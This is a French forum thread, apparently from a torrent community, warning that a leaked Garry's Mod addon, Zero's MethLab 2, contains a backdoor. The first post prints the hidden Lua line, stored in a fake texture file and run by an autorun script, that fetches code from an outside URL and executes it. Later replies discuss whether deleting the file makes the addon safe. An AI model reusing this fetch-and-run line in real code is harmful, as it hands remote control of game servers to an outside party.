Non Vérifié Zero´s MethLab 2

Jotech

Master 🏆
Level 5
VeryFriend's

Torrents Stats

Messages
87
J'aime
356
Trophées
852
Inscrit
21 Août 2017
BACKDOOR: "zeros_methlab\lua\autorun\npc_help.lua"
L'autorun execute le code contenu dans le fichier "zeros_methlab\materials\npc\help.vtf" qui est un fichier texte en réalité qui contient:
Code:
timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=MzIMjWYbDYnz4toBlWKo", function(b) RunString(b, ":", false) end)end)
 

dododoo

Membre 🏅
Level 1

Torrents Stats

Messages
18
J'aime
0
Trophées
19
Inscrit
3 Décembre 2022
en supprimmant la backdoor on peux le use sans soucis ?
 

XIXIXIX

l'Actif 🥉
Level 1

Torrents Stats

Messages
105
J'aime
3
Trophées
46
Inscrit
20 Décembre 2023
en supprimmant la backdoor on peux le use sans soucis ?
En théorie, si tu arrives à identifier et retirer le fichier exact qui contient la backdoor, tu pourrais potentiellement utiliser l'addon sans risque. Cependant, ce n'est pas garanti. Voici pourquoi :

  1. Propagation du code malveillant : La backdoor pourrait être liée à d'autres fichiers ou se répliquer ailleurs dans l'addon. Même si tu supprimes un fichier, il est possible que d'autres parties de l'addon aient été modifiées ou qu'il y ait d'autres vecteurs d'attaque.
  2. Difficile à détecter : Les backdoors sont parfois bien dissimulées. Elles peuvent être cachées dans du code qui semble légitime, ou activées par des actions spécifiques. Un simple nettoyage manuel ne suffit pas toujours.
  3. Source de confiance : Même si tu retires un fichier avec la backdoor, il est toujours difficile de faire confiance à l'addon s'il vient d'une source douteuse ou non vérifiée.
Pour garantir ta sécurité :

  • Utilise des sources fiables : Télécharge l'addon uniquement depuis des sources sûres ou officielles.
  • Mets à jour : Vérifie s'il existe une version mise à jour et sécurisée de l'addon sans backdoor.
  • Analyse : Utilise des outils d'analyse pour vérifier que l'addon ne contient plus de code malveillant.
En résumé, retirer un fichier peut ne pas suffire à garantir que l'addon est complètement sûr. Il vaut mieux être prudent et peut-être chercher une alternative plus sûre.
 
Haut Bas